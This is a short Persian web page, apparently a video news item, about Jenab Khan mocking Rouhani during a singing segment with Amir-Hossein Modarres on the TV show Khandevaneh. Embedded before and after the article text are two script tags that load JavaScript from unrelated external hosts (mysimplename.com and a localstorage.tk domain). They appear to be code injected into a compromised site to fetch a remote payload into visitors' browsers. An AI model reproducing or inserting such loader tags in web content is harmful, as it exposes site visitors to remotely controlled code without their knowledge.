تیکه سنگین «جناب خان» به «روحانی» در خندوانه


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>در بخشی از برنامه خندوانه امیرحسین مدرس و جناب خان در بخشی از برنامه مسابقه آواز دادند و جناب خان در واکنش به آهنگ کلید که مدرس خواند طعنه ای به روحانی زد و از ارتباط کلید با ریاست جمهوری گفت. البته اگر دلیل عدم پخش این قسمت برنامه همین نکته بوده که منطقی نیست. زیرا به راحتی میتوان آن را حذف کرد.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)